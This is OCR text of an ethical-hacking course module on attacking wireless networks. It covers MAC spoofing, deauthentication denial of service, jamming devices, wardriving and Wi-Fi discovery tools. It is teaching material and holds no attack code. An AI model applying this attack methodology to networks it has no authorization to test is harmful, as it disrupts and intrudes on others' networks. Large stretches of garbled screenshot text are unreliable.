
Attacker

Hacker spoofing the MAC address
C o pyrigh t © b y

EG-Gouncil. All

Rights KeServect;R ep rod u ctio n is Strictly Prohibited.

AP M A C Spoofing
In wireless LAN networks, the access points transmit probe responses (beacons) to advertise their presence in the air. The probe responses contain the information about their identity (MAC address) and identity of the network it supports (SSID). The clients in the vicinity connect to the network through these beacons based on the MAC address and the SSID that it contains. Many software tools and most of the APs allow setting user-defined values for the MAC addresses and SSIDs of AP devices. Attackers spoof the MAC address of the AP by programming the AP to advertise exactly the same identity information as that of the victim AP. Attackers spoof the MAC address of the wireless LAN client equipment to masquerade as an authorized client and to connect to the AP. As the attacker connected to the AP as the authorized client, he or she can have full access to the network as that of a legitimate client and the attacker can use the connection for his or her own malicious purposes and can eavesdrop on sensitive information.

Module 15 Page 2222

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE 15.21: AP MAC Spoofing

Module 15 Page 2223

Ethical Hacking and Countermeasures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

D e n ia l-o f-S e r v ic e A tta c k
Data Warehouse

CEH

W ireless DoS attacks disrupt n e tw o rk w ireless connections by sending broadcast "deau thenticate" comm ands

Transmitted deauthentication forces the clients to disconnect from the AP

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

D en ia l‫־‬of‫־‬Service Attack
Wireless networks are susceptible to denial-of-service (DoS) attacks. Usually these networks operate in unlicensed bands and the transmission of data takes in the form of radio signals. The designers of the MAC protocol aimed at keeping it simple, but it has its own set of flaws that are more attractive to DoS attacks. WLANs usually carry mission-critical applications such as VoIP, database access, project data files, and internet access. Disrupting such missioncritical applications on WLANs by DoS attack is easy. This usually causes loss of productivity or network downtime. Examples of MAC DoS attacks are: de-authentication flood attack, virtual jamming, and association flood attacks. Wireless DoS attacks disrupt network wireless connections by sending broadcast "deauthenticate'‫ ׳‬commands. Broadcast deauthentication forces the clients to disconnect from the AP.

Module 15 Page 2224

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

User-2

Data Warehouse

5 ^ ■ ^ ? f/ / . lV I . f j ’—
:°‫ ״‬nected Administrative Decision

A S 0 «'V **

© 6fV>

%
Attacker

FIGURE 15.22: Illustrating Denial-of-Service Attack on wireless networks

Module 15 Page 2225

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

J a m m in g S ig n a l A tta c k

An attacker stakes out the area from a nearby location with a high gain amplifier drowning out the legitimate access point

All wireless networks are prone to jamming, This jamming signal causes a DoS because 802.11 is a CSMA/CA protocol, whose collision avoidance algorithms require a period of silence before a radio is allowed to transmit

J

Users simply can't get through to log in or they are knocked off their connections by the overpowering nearby signal

Attacker

Jamming Device

Copyright © b y

EG-G(nncil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Ja m m in g Signal A ttack
Spectrum jamming attacks usually block all communications completely. This kind of attack can be performed with the help of a specialized hardware. An attacker stakes out the area from a nearby location with a high gain amplifier drowning out the legitimate access point. Users simply can't get through to log in or they are knocked off their connections by the overpowering nearby signal. All wireless networks are prone to jamming. The signals generated by jamming devices appear to be an 802.11 transmission to the devices on the wireless network, which causes them to hold their transmissions until the signal has subsided resulting in denial-of-service. These jamming signal attacks are relatively easily noticeable.

Module 15 Page 2226

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Attacker

x

sending 2.4 GHz jam m ing signals

A tta ck er

Jam m in g D evice

FIGURE 15.23: Jamming Signal Attack

Module 15 Page 2227

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W i- F i J a m m i n g D e v i c e s
MGT- P6 G PS Ja m m e r MGT- M P200 Ja m m e r

C EH

MGT- 03 Ja m m e r

llli

R a n g e: 1 0 2 0 '‫־׳‬ meters 4 antennas 3G: 2110 ~2170MHz

Range: 50 - 75m Barrage + DDS sweep jamming 20 to 2500 MHz. Omni-directional

R a n g e: 0 40‫׳־־׳‬ meters 4 antennas

I

Wi-Fi / Bluetooth: 2400 2485 ‫׳״‬MHz

MGT- P6 Wi-Fi Ja m m e r

MGT- P 3 x l3 Ja m m e r

MGT- 04 W iF i Ja m m e r

i

1

Range: 10 ~ 20 meters iDen -CDMA -GSM: 850 ~ 960MHz DCS •PCS: 1805‫״׳‬ 1990MHz 3G: 2110 ~ 2170MHz Wi-Fi / Bluetooth: 2400 ~ 2485MHz 4 antennas

R a n g e: 50 ~ 200 meters 3 frequency bands jammed

Range: 0 80 ‫ ׳־׳‬meters 4 Frequency bands jammed: •GSM: 925 *960 ‫״‬Mhz •DCS: 1805 ~ 1880 Mhz 3 ‫־‬G: 2110 ~ 2170 Mhz -WiFi / Bluetooth: 2400 ‫־׳‬ 2485 MHz 4 antennas

http://www.magnumtelecom.com
Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Ja m m in g D evices
Wi-Fi jamming is a kind of attack on wireless networks. This can be done by using some hardware devices. The devices used by the attacker for Wi-Fi jamming use the same frequency band as that of a trusted network on which the attacker want to launch the attack. The Wi-Fi jamming devices generate the signals with the same frequency as that of the trusted wireless network signals. This causes interference to the legitimate signal and temporarily disrupts the network service. The following are a few Wi-Fi jamming devices:

Module 15 Page 2228

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

MGT- P6 GPS Jammer

MGT- MP200 Jammer

MGT- 03 Jammer

Range : 10 ~ 20 meters 4 antennas 3G: 2110“ 2170MHz Wi-Fi/ Bluetooth: 2400~ 2485MHz

Range: 50-75m Barrage + DDS sweep jamming 20 to 2500 MH2 . Omni-directional antennas

Range : 0 ~ 40
m e te rs

%
MGT- 04 WiFi Jammer
Range: 0 ~ 80 meters 4 Frequency bands

MGT- P6 Wi-Fi Jammer
Range: 10 ~ 20 meters iDen - CDMA - GSM: 850" 960MHz DCS PCS: 180 5' 1990MHz 3G: 2110 ~ 2170MHz W i Fi / Bluetooth: 24003485MHZ 4 antennas

MGT- P3xl3 Jammer

HH

Range : 50~ 200 meters 3 frequency bands jammed

jammed: GSM: 925~ 960 Mh ‫ ־‬DCS: 1 8 0 S 1880 Mh? - 3 G : 2 1 1 0 2 1 7 0 ‫ ״‬Mhz

2

W iFi/Bluetooth: 2400‫*׳‬ ?48SMH7 4 antennas

FIGURE 15.24: Various Wi-Fi jamming devices

Module 15 Page 2229

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module Flow

CE H

M odule Flow
Wireless networks are prone to many vulnerabilities. Even though proper security mechanisms are employed by an organization, it may still be vulnerable. This is because the security mechanisms themselves may contain flaws. Attackers can hack a wireless network by exploiting those vulnerabilities or flaws in security mechanisms. For full scope penetration testing, the pen tester must test the network by following a wireless hacking methodology.

Wireless Concepts

Wireless Encryption

^

Wireless Threats

Wireless Hacking Methodology

Wireless Hacking Tools

^ y—
v‫׳‬

Bluetooth Hacking

Countermeasure s ‫־‬

Wireless Security Tools

Module 15 Page 2230

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Pen Testing

Module 15 Page 2231

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless H acking M ethodology

CEH

W i-Fi D isc o ve ry

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources

C o m p ro m ise the W i-Fi N e tw o rk

C ra c k W i-F i E n c ry p tio n

Lau n ch W ire le ss A tta c k s

Copyright © b y

EG-G*nncil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Hacking Methodology
‫ ־‬J The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. Attackers usually follow a hacking methodology to ensure that they don't miss even a single entry point to break into the target network. Discovering a Wi-Fi network or device is the first action that an attacker should perform. You can perform Wi-Fi discovery with the help of tools such as insider, NetSurveyor, insider, NetStumbler, Vistumbler, WirelessMon, etc.

Module 15 Page 2232

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Footprint the W ireless Network

(citifwd

c EH
ItkKJl NMkw

Attacking a wireless network begins with discovering and footprinting the wireless network in an active or passive way

Passive Footprinting Method
An attacker can use the passive way to the existence of an A P detect

by sniffing the packets

from the airwaves, which will reveal the AP, SSID and attacker's wireless devices that are live
A tta c k e r sn iffs W i- F i t ra ffic

A ctive Footprinting Method
A tta ck er sends a p ro be request A P sends probe

In this method, attacker's

wireless device sends to see if an AP does not have

^ .........

re s p p n s e m‫י‬

out a probe request with the SSID responds. If the wireless device request with an empty SSID

the SSID in the beginning, it will send the probe

J
Copyright © by E C - C M C i . All Rights Reserved. Reproduction is Strictly Prohibited.

Footprint the Wireless Network
Attacking a wireless network begins with the discovery and footprinting of a wireless network. Footprinting involves locating and analyzing (or understanding) the network. Footprinting of a wireless network can be done in two methods. In order to perform footprinting of a wireless network the first requirement is identifying the BSS that is provided by the access point (AP). BSS or IBSS can be identified with the help of SSID. The attacker can use this SSID to establish an association with the AP. Footprinting Methods:
c M W

P a s s iv e m e th o d

An attacker can use the passive way to detect the existence of an AP by sniffing the packets from the airwaves, which can reveal the AP, SSID, and attacker's wireless devices that are live.

0

) A c tiv e M e th o d

In this method, the attacker's wireless device sends out a probe request with the SSID to see if an AP responds. If the wireless device does not have the SSID in the beginning, it can send the probe request with an empty SSID. In case of probe request with an empty SSID, most of the APs respond to it with their own SSID in a probe response packet.

Module 15 Page 2233

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Consequently, the empty SSIDs are useful in knowing the SSIDs of APs. Here the attacker knows the correct BSS with which to associate. An AP can be configured to ignore a probe request with an empty SSID.

Module 15 Page 2234

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Attackers Scanning for Wi-Fi Networks

CEH —— -

Copyright © b y

EG-C*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Attackers Scanning for W i-F i Networks
▼ ▼ Attackers can scan for Wi-Fi networks with the help of wireless network scanning tools such as NetSurveyor, Retina Wi-Fi scanner, etc. The service set identifier (SSID) can be found in beacon, probe requests and responses, and association and reassociation requests. An attacker can gain obtain the SSID of a network by passive scanning. If the attacker fails to obtain SSID by passive scanning, then he or she can determine it by active scanning. Once the attacker succeeds in determining the SSID, he or she can connect to the wireless network and launch various attacks. Wireless network scanning allows sniffing by tuning to various radio channels of the devices.

Module 15 Page 2235

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE 15.25: Scanning of Wi-Fi networks by attackers

Module 15 Page 2236

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

F in d

W i- F i N e tw o r k s

to A t t a c k

1. The first task an attacker will go through when searching for Wi-Fi targets is checking th e potential netw ork s that are in range to

S te p s

find the best one to attack 2. Drive around w ith Wi-Fi enabled laptop installed w ith a wireless discovery tool and map out active wireless networks

/
L a p to p w ith W i-Fi C ard

You w ill n e e d th e s e to d is c o v e r W i-Fi n e tw o rk s E x te rn a l W iFi A n te n n a

I
N e tw o rk D is c o v e ry P ro g ra m s

--------

©

©
Tools Used: inSSIDer, NetSurveyor, NetStumbler, Vistumbler etc.

Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Find W i-F i Networks to Attack
The first task an attacker can go through when searching for Wi-Fi targets is checking the potential networks that are in range to find the best one to attack. Wi-Fi networks can be found by driving around with a Wi-Fi enabled laptop. The laptop must have a wireless discovery tool installed on it. Using the discovery tool, the attacker can map out the active wireless networks. To discover Wi-Fi networks, the attacker needs: 9 9 9 Laptop with Wi-Fi card External Wi-Fi antenna Network discovery programs

Several Wi-Fi network discovery tools are available online that give more information about the wireless networks in the vicinity. Examples of tools that can be used for finding Wi-Fi networks include inSSIDer, NetSurveyor, NetStumbler, Vistumbler, etc.

Module 15 Page 2237

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W i-Fi D isco v e r y Tool: inSSIDer
File View
® *

Help
1 1 -1 4 -‫ | | י״‬Network Type w 1

Stop GPS

EnGen1u5 8Q2.Ha/b/g/n Wireless USB Adopter F

Step

FILTER

m eta g ee k

M ACAddress 00:1E:58 00:19:77 • E0:91:F5 0G1D:7E M 00.1977 1• % ‫* י‬ l %

I SSID M«aGeek_QA_1 NttaGMkGN Key Deagn W eb»!© 8 5THCONFL MetaGeekGN RADIUS-TEST0 UCEEM-24GHZ Tiire Grach 2.4 GHr Charnela

1RSSI

Channel | Secufty ‫־ ־־‬47 5*1 W?A2-P«fsonal WPA2-P«fsonal WPAFeracral WPA-Fenoral WPA2-Peracnd WPA2-Entetprisc WPA2-P«w m I

M ax Rate 3 0 0 1 3 0 5 4 5 4 IX 2 1 6 2 1 6

| Netwoik Type In frastructure Irtfrastfucture Infrastructure Hraottucture Irfrasttudure Infrastructure Irfrastfucture

Vendor D L m kCo‫־‬ poraton Aerohve I4ec*aks. he. NETGEAR Gsco LiT k3 y3 ‫־‬ . LLC Aerofave Netwaks. he. CradlePont. I‫׳‬rj D-M EDIAC om rouncabo

j‫׳‬

------ • 5 9 1 1 ;------ *5 6 ------ 6 56 1 ------ * 1 _ • 7 91 1 1 ___ &GH2 Cbarrels •‫ יד‬1 1 = - 1

V

00 3044 0011 E0 ■ lirprcve YourVtf-Fi

1.

Inspect W LAN and surrounding networks to troubleshoot competing access points

2. Track the strength of received signal in dBm over tim e and filter access points in an easy-to-use form at 3. 4. Highlight access points for areas w ith high W i-Fi concentration Export W i-Fi and GPS data to a KM L file to view in Google Earth and Filter through hundreds of scanned access points

•MatoGailcGN • 2 0 -JLB 3 0 ■MataGeek_QA_1 - Key Dejipri \vet»!tea 4 0 •AHAGuoot y<|w ost41J5 5 0 -m •5THCONFL • 6 0 ‫ ־‬IJCFFM-? 4GH7 ‫•יי‬ • 70 -Gallatin Guest -RADUS-TEST0 80 -MctoGodtGN ■ 9 0 •GALLATIN • 1 0 0

21/29 AP(s)

Waiting

Logging: Off

Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Discovery Tool: inSSIDer
H i Source: http://www.metageek.net InSSIDer is open source Wi-Fi scanner software. It works with Windows Vista/7 and 64-bit PCs. It uses the Native Wi-Fi API and the current wireless network card, sorts the results by MAC address, SSID, channel, RSSI, and "Time Last Screen." SSID dos:
9 9 9 9

Inspect WLAN and surrounding networks to troubleshoot competing access points Track the strength of the received signal in dBm over time Filter access points in an easy-to-use format Highlight access points for areas with high Wi-Fi concentration

9 Export Wi-Fi and GPS data to a KML file to view in Google Earth
9

Filter through hundreds of scanned access points

Module 15 Page 2238

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE 15.26: inSSIDer Screenshot

Module 15 Page 2239

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Discovery Tool: Net$urvfeyor I C E H
J NetSurveyor is a network discovery tool used to gather information about nearby wireless access points in real time

http://www.perform ancewifi.net

-Cbpyright © b y EC - C M IC il. All RightsResen/ed^Reproduction Is Strictly Probfbited.

jt

j*

W i-Fi Discovery Tool: NetSurveyor
Source: http://www.performancewifi.net

NetSurveyor is an 802.11 (WiFi) network discovery tool that gathers information about nearby wireless access points in real time and displays it in useful ways. The data is displayed using a variety of different diagnostic views and charts. Data can be recorded for extended periods and played-back at a later date/time. Also, reports can be generated in Adobe PDF format.

Module 15 Page 2240

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2241

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W i-F i D isco very Tool: N etS tu m b ler
Facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards

C

EH

1 X 5 .1 ‫׳‬ ‫•׳‬ 3 3 H BM E3 E

1. 2.

W a r d r iv in g V e r if y in g n e t w o r k c o n f ig u r a t io n s

3.

F in d in g lo c a t io n s w i t h p o o r c o v e r a g e in o n e 's W L A N

4.

D e te c t in g c a u s e s o f w ir e le s s in te rfe re n c e

‫ם •ויו‬

5.

D e te c t in g r o g u e a c c e s s p o in ts

IH li

6.

A im in g d ir e c t io n a l a n te n n a s f o r lo n g - h a u l W L A N lin k s

M

‫ ך‬iq'iftf* IHIIIM]
110%/t7m 0*w11 • ...

1 !1 I III M i

http://www.netstumbler.com

Copyright © b y K - C w n c il. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Discovery Tool: NetStumbler
Source: http://www.netstumbler.com NetStumbler is a tool that sniffs Wi-Fi signals and informs users if their wireless network is properly configured. But prior to downloading, users need to check if their wireless cards are compatible with NetStumbler. The next step is to disable the automatic configuration service of the said device. Users of Windows machines, for example, must turn off the Windows Wireless Zero Configuration service, which can be located in the Control Panel/Administrative Tools/Services. NetStumber features several columns that provide useful information on detected signals. The media access control column or MAC reflects signal strengths as indicated by the color of the dots that represent each entry. A padlock symbol inside the dot suggests that the access point is encrypted. The SSID or service set identifier column locates the network from which the wireless packets come from. The Chan (channel) heading shows which channel the network access point is tapping for signal broadcasting and beside that is the column for channel speed, which is expressed in Mbps. The vendor heading reveals the name of device manufacturers like Linksys, Netgear, D-link, and 2Wire while the Signal-to-Noise Ratio column indicates the quality of Wi-Fi signal. Commonly used for:

Module 15 Page 2242

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

Wardriving Verifying network configurations Finding locations with poor coverage in one's WLAN Detecting causes of wireless interference Detecting unauthorized ("rogue") access points Aiming directional antennas for long-haul WLAN links
Ete Ed* Y*‫׳‬ w Cpacre wrto*

9
9 9 9 9

‫־‬H
CK 1 3 11 3 .5 6 II 1 6 3 5 1 7 1 1 1 1 WEP Tr t* AP AP AP AP Y ai AP AP AP Y ai AP AP AP AP Y ai AP Y ai AP AP AP AP 5510 A rW O H A rW o w A rW 0*f A rW < m Alan2 Alpha alpha a» d « lo n A n fa la 't A rp o rt A rana A n ja la 't A rp o rt A rana
any ANY H am

2> ‫ם‬q ► < &1 ‫ > י‬s i * * 1f
a '4 ' OionMti
»T> — HJC

i'f 4
I 'f t f ’t 7

• '( > ■ •gt • 000220008551 # • • • 0040962*702* 00409632*06( 00409635B3F? 0040963902s;,.

.1

‫״‬

‫י‬

‫ח ״ ו׳‬

# O O 0 2 2 t> 0 F 9 t2 1 #006010*02*88 • OO022D0FCCC8 # 00601 C f0 5« 5C #0040964429® A # 0 0 6 0 1 0 1 El AFC # 0 0 4 0 9 6 3 0E 8 0 8 # 0040964928E5 • 0 06 01 0 22 C 09 4 # 0 06 01 DF1CC7P #009048084891• # 0 030A 80650A 6 # 0 0 0 2 2 t> 0 c 3 3 0 c # 00022D 08A 6A 9 # 0 0 0 2 2 D IF 5 C * 7 # 0 0 0 2 2 b lF 6 5 3 8
M

H oppy Oonwts A rW «*aO na AP2 P r n ta r '1 Inc M ov »ta« «aw API P rvrtar‘! Inc M oontaew iew

A n g lo 'S Antmol Town H ffO thl'f Hor*}C*er Haavn

A part»an t App la N etw ork 080609 Appla N etw ork If5 d b 7 Apple N etw ork 116538

V endor SN P Aq4re (lo c a n t) O rinoco A q tr t (lo c a n t) W avelA N A g tri (lo c a n t) O rinoco A<j*r* (Locant) W avel AN C ijco (A ironat) A 9a ra (lo c a n t) W a v a l AN C itco (A ironat) C isco (A ironat) * 9«ra (lo c a n t) W <m lA N A je re (lo c a n t) W avalA N G am tak (t>‫ ־‬L 1nk) O alta N etw ork! Aq*r4 (lo c a n t) O rinoco A 9a ra (lo c a n t) O rinoco A$4r4 (lo c a n t) O rinoco A aere (lo c a n t) O rinoco

| ^JR • 20 10 27 46 10 9 32 8 31 48 13 11 2 13 5 •I

| latitude

| 10 l±J

N 37413520 Wl N 3 7 3 32 25 3 Wl N 37 .4 12 74 8 W l N 37 4 4 2 6 4 3 N 37 4 4 3 0 7 3 N 37 410712 N 3 7 3 3 3 67 8 Wl Wl Wl Wl

i

1 ‫נ‬

«

i

• r1

• 0 0 0 2 2 0 0 fC E C l± J • • • • • •

00 0 0 2 2 0 0 f 0 l0 <

0 00 22 01 B 76 5f 0 0 0 22 01 F 65 06 , 0 06 01 01E3741 0 0 6 0 ! w 0 je 8 £ 0 06010F 0565C 00601 O f 2 4 7 4 !

1 A *tan2

S 4 alpha $ 4k. aaKtwlon a A A n^ala's A irpo rt A 3 A . ANY * 4 k A part*an t i 4 4ppl< N atw ork 00■ • Appla N etw ork lf * ^ , J__ :___ I if

in iW m

‫־‬ ‫״‬ 06/07/01 06/07/0106/07/0106/07/01 06/07/01 06/07/0106/07/0106/07/0106/07/0106/07/0106/07/01 09:24 3 3 0* 24:5009:25= 1 0 09:25 30 10:19:43 10200010:20:2010:20:4010:210010:21:5010:22:10

*

FIGURE 15.28: NetStumbler Screenshot

Module 15 Page 2243

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi D iscovery Tool: Vistumbler

CEH

1. Finds wireless access points 2. Uses the Vista command ,netsh wlan show networks mode=bssid' to get wireless information 3. It supports for GPS and live Google Earth tracking

Copyright © b y

EG-Gtlincil. All

Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Discovery Tool: Vistum bler
Source: http://www.vistumbler.net Vistumbler is a wireless network scanner. It keeps track of total access points w/gps, maps to kml, signal graphs, statistics, and more. Features: 9 9 Supports Windows Vista and Windows 7 Find Wireless access points - Uses the Vista command ,netsh wlan show networks mode=bssid' to get wireless information

Q 6

GPS support Export/import access points from Vistumbler TXT/VS1/VSZ or Netstumbler TXT/Text NS1 Export access point GPS locations to a google earth kml file or GPX (GPS exchange format) Live Google Earth Tracking: auto KML automatically shows access points in Google Earth Speaks Signal Strength using sound files, Windows sound API, or MIDI

9

9 9

Module 15 Page 2244

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

O VistumblervlO.il - By Andrew Calcutt - 2011/11/11 - (2011-11-21 23-57-00 mdb)
File Edit Options Use GPS
( Graphl 1[ Graph2

View

Settings

Interface

Extra

WifiDB

Help

*Support Vistumbler* Latitude: N Longitude: E

Active APs: / Actual bop time:

3 05 3 1 0 1 2 ms
Active Dead Dead Dead Dead Active Active Active Dead Active Dead Active Active Active Active Active Active Dead Active Active Active Active Active LlAN E-PC.N et.. Rajpriya BUFFALO Kiang HSPAWirelessG... Bonjour HOME Lai's home superlink linksys yee_family EW H O M E Philip dlink Ng's Family speed1‫־‬ SSID TP -U N K linksys22F KUO_BELKIN ling-Hom e JackyPO Signal 0% 0% 0% 0% 2 6% ) ‫_ ־‬ 3 8% ( - _ 100% 0% 3 8% ( - _ 0% 3 6% ( - _ 38% (■_ 34% ( - _ 2 8% (■_ 8 8% ( - _ 3 4% ( - _ 0% 36% )-.‫״‬ 2 6% 1 0 % )-‫״‬

0 0 0 0 .0 0 0 0 0 0 0 0 .0 0 0 0
Authentication WPA2-PSK WPA-PSK Open WPA2-PSK Open WPA-PSK WPA2-PSK WPA2-PSK Open Open WPA-PSK WPA2-PSK WPA2-PSK Open WPA-PSK WPA2-PSK WPA2-PSK WPA2-PSK WPA-PSK Open WPA2-PSK WPA2-PSK Encryption AES AES WEP AES WEP TKIP AES AES WEP Unencrypted TICP AES AES WEP TICP AES AES AES TKIP Unencrypted AES AES

S Authentication (j) Channel (j) Encryption S Network Type i SSID

# w 34 • 33 • 32 • 31 * 30 #29 *28 w 27 at 26 • 25 *24 • 23 • 22 #21 *20 *19
_

High Signal 8 8% (-38... 3 0% (-78... 2 6% (-81... 3 2% (-77... 8 8% (-38... 6 0% (-58... 100% (-30... 1 6% (-88... 8 8% (-38... 8 8% (-38... 8 8% (-38... 8 8% (-38... 8 8% (-38... 30% (-78... 8 8% (-38... 8 8% (-38... 8 8% (-38... 36% (-74... 8 8% (-38... 1 8% (-86...

IS

#17 *16 • 15 * 14 #13

4 6 % )-.‫ ״‬8 8% (-38... 7 4 % (-... 8 8% (-38...

FIGURE 15.29: Vistumbler Screenshot

Module 15 Page 2245

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi D iscovery Tool: W irelessM on

CEH -------

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

/

> W i-Fi Discovery Tool: W irelessM on

•yi-,;‫ ♦׳‬Source: http://www.passmark.com WirelessMon is a software tool that allows users to monitor the status of wireless Wi-Fi adapter(s) and gather information about nearby wireless access points and hot spots in real time. It can log the information it collects into a file, while also providing comprehensive graphing of signal level and real time IP and 802.11 Wi=Fi statistics. Some of the features of WirelessMon include:
9 9 9

Verify 802.11 network configuration is correct
Test Wi-Fi hardware and device drivers are functioning correctly Check signal levels from your local Wi-Fi network and nearby networks

9
9

Help locate sources of interference to your networ Scan for hot spots in your local area (wardriving) GPS support for logging and mapping signal strength Mapping can be performed with or without a GPS unit Correctly locate your wireless antenna (especially important for directional antennas)

9
9 9

Module 15 Page 2246

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9 9 9

Verify the security settings for local access points Measure network speed & throughput and view available data rates Help check Wi-Fi network coverage and range
* I WiroletsMon Evaluation Copy
File CorfiguiotKn Hdp

I^

‫מ‬
SetaaNetvrafcCad

a t
METGEAR WG1 ‫ ו ו‬v354Mfcp1 Viietess USB 2 0 Adaptef * Parkel Sc+‫־‬ «due. Wripori v‫׳‬ [Reload Cads |

a

F r^ 1 * » y Status 0 N U Ava A Net Ava. ^C o nn ec ... A Available 0 Avaibbte 0 Av*1khl* 0 Available 0 Available 0 Available & Available

